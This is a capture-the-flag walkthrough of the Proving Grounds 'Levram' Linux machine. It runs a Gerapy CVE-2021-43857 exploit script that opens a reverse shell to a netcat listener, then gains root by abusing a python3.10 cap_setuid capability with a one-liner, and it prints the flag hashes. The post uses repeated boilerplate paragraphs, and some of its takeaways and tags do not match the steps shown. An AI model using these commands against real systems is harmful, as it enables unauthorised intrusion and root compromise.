Post

Proving Grounds - Levram (Linux)

Proving Grounds Levram Linux walkthrough covering reconnaissance, initial access, and privilege escalation.

Posted Updated
By Paul
5 min read
Proving Grounds - Levram (Linux)

Overview

Field Value
OS Linux
Difficulty Not specified
Attack Surface Web application and exposed network services
Primary Entry Vector Web RCE (CVE-2021-43857)
Privilege Escalation Path Local enumeration -> misconfiguration abuse -> root

Credentials

No credentials obtained.

Reconnaissance

💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

Initial Foothold

Screenshot from the levram engagement Caption: Screenshot captured during this stage of the assessment.

Screenshot from the levram engagement Caption: Screenshot captured during this stage of the assessment.

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

python3 exploit.py -t 192.168.178.24 -p 8000 -L 192.168.45.166 -P 4444

1
2
3
4
5
6
7
8
9
10
11
12

❌[1:46][CPU:12][MEM:63][TUN0:192.168.45.166][...Levram/CVE-2021-43857-POC]
🐉 > python3 exploit.py -t 192.168.178.24 -p 8000 -L 192.168.45.166 -P 4444
[INFO] Logging in to Gerapy...
[INFO] Login successful.
[INFO] Fetching project list...
[INFO] Using project: test
[INFO] Fetching build details for project 'test'...
[INFO] Found project ID: 1
[INFO] Starting netcat listener...
[INFO] Sending exploit payload...
listening on [any] 4444 ...

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

nc -lvnp 4444

1
2
3
4
5
6
7
8

❌[1:46][CPU:18][MEM:64][TUN0:192.168.45.166][/home/n0z0]
🐉 > nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.24] 51760
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$

Retrieved local.txt: At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1
2

find / -iname local.txt 2>/dev/null
cat /home/app/local.txt

1
2
3
4

app@ubuntu:~$ find / -iname local.txt 2>/dev/null
/home/app/local.txt
app@ubuntu:~$ cat /home/app/local.txt
96a5b02c4dad361c9276ac69edfca332

💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1
2
3
4

/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1
2

/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id

1
2
3

app@ubuntu:/tmp$ /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ubuntu:/tmp# id

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

cat /root/proof.txt

1
2
3

root@ubuntu:/tmp# cat /root/proof.txt
97eb66bd4855acee30143adb50590ff0

💡 Why this works
Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.

Lessons Learned / Key Takeaways

  • Validate framework debug mode and error exposure in production-like environments.
  • Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
  • Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
  • Treat exposed credentials and environment files as critical secrets.

Attack Flow

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

graph LR
    subgraph SCAN["🔍 1. スキャン"]
        direction TB
        A1[Rustscan] --> A2["ポート発見<br/>22: SSH OpenSSH 8.9p1<br/>8000: HTTP WSGIServer"]
        A2 --> A3[Nmap サービス検出]
        A3 --> A4["Gerapy 特定<br/>v0.9.7<br/>Python 3.10.6"]
        A4 --> A5[Webアクセス確認]
        A5 --> A6["脆弱性調査<br/>CVE-2021-43857<br/>Gerapy RCE"]
    end
    subgraph INITIAL["🚪 2. 初期侵入"]
        direction TB
        B1[デフォルト認証テスト] --> B2["ログイン成功<br/>admin:admin"]
        B2 --> B3["プロジェクト作成<br/>test"]
        B3 --> B4["CVE-2021-43857 Exploit<br/>exploit.py実行"]
        B4 --> B5["リバースシェルペイロード<br/>192.168.45.166:4444"]
        B5 --> B6["appユーザーシェル取得"]
        B6 --> B7["local.txt<br/>96a5b02c4dad..."]
    end
    subgraph PRIVESC["⬆️ 3. 権限昇格"]
        direction TB
        C1["getcap実行<br/>能力列挙"] --> C2["python3.10 発見<br/>cap_setuid=ep"]
        C2 --> C3["setuid能力悪用<br/>os.setuid(0)"]
        C3 --> C4["Python exploit実行<br/>os.system(/bin/bash)"]
        C4 --> C5["rootシェル取得"]
        C5 --> C6["proof.txt<br/>97eb66bd48..."]
    end
    SCAN --> INITIAL
    INITIAL --> PRIVESC
    style A6 fill:#ff6b6b
    style B6 fill:#51cf66
    style B7 fill:#ffd43b
    style C5 fill:#ff6b6b
    style C6 fill:#ffd43b

References

  • CVE-2021-43857: https://nvd.nist.gov/vuln/detail/CVE-2021-43857
  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
  • feroxbuster: https://github.com/epi052/feroxbuster
  • Nuclei: https://github.com/projectdiscovery/nuclei
  • GTFOBins: https://gtfobins.org/
  • HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
Proving Grounds, Linux
rce suid php privilege-escalation
This post is licensed under CC BY 4.0 by the author.